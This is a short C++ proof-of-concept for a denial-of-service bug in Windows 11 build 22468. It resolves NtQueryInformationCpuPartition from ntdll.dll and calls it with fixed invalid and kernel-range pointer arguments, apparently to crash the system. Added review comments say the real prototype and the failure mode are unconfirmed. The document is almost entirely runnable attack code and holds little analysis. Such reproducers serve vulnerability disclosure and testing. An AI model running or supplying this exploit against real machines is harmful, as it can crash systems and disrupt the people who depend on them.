Denial of Service bug in Windows 11 (22468 build) NtQueryInformationCpuPartition
#include <Windows.h>
#include <cstdio>
// Function-pointer type used to call the ntdll export named by FUNC_NAME.
// Every parameter is declared as ULONG_PTR, so the caller passes raw
// pointer-sized integers instead of typed handles or buffers; on a 32-bit
// build the 64-bit constants used in main would be truncated.
// NOTE(review): the parameter names are the author's labels; the system
// call's real prototype is not shown on this page - confirm before relying
// on the meaning of any argument.
typedef NTSTATUS(NTAPI* pfnNtQueryInformationCpuPartition)(
ULONG_PTR PartitionHandle,
ULONG_PTR Flags,
ULONG_PTR OutputBuffer,
ULONG_PTR Length,
ULONG_PTR ReturnedLength
);
// Export name looked up in ntdll.dll at run time and echoed in the output.
#define FUNC_NAME "NtQueryInformationCpuPartition"
int main()
{
    // Reproducer for the issue named in the page title (Windows 11 build
    // 22468). It resolves the export from the already-loaded ntdll.dll,
    // calls it once with fixed argument values, and prints the NTSTATUS.
    // NOTE(review): the page does not say which argument the affected build
    // mishandles, nor how the failure shows up - only that it is a denial
    // of service.
    HMODULE ntdllModule = GetModuleHandle(TEXT("ntdll.dll"));
    pfnNtQueryInformationCpuPartition queryCpuPartition = NULL;

    // Fixed call arguments, kept exactly as published. Assuming x64 with
    // 48-bit virtual addresses, none of the pointer-like values refers to a
    // usable user-mode buffer, so a build that validates its arguments
    // would presumably reject the call - confirm against a fixed build.
    const ULONG_PTR partitionHandleArg = 0x00007ffffffefffe; // near the top of the user-mode range
    const ULONG_PTR flagsArg           = 0xffff800000000001; // high (kernel-half) value
    const ULONG_PTR outputBufferArg    = 0x0000800000000000; // first non-canonical address
    const ULONG_PTR lengthArg          = 0x000000000000fffe; // 65534
    const ULONG_PTR returnedLengthArg  = 0xfffff80000000000; // kernel-half address

    printf_s("[>]Start\r\n");

    if (ntdllModule != NULL) {
        queryCpuPartition = reinterpret_cast<pfnNtQueryInformationCpuPartition>(
            GetProcAddress(ntdllModule, FUNC_NAME));
    }

    if (ntdllModule == NULL) {
        printf_s(">No dll handle\r\n");
    }
    else if (queryCpuPartition == NULL) {
        // Read the error code before any other API call can overwrite it.
        // This branch is taken on builds that do not export the function.
        DWORD lookupError = GetLastError();
        printf_s(">%s not found, GetLastError %lu\r\n", FUNC_NAME, lookupError);
    }
    else {
        NTSTATUS callStatus = queryCpuPartition(partitionHandleArg,
                                                flagsArg,
                                                outputBufferArg,
                                                lengthArg,
                                                returnedLengthArg);
        // Reached only if the call returns to user mode.
        printf_s(">%s NTSTATUS 0x%lX\r\n", FUNC_NAME, callStatus);
    }

    printf_s("[<]Stop");
    ExitProcess(0);
}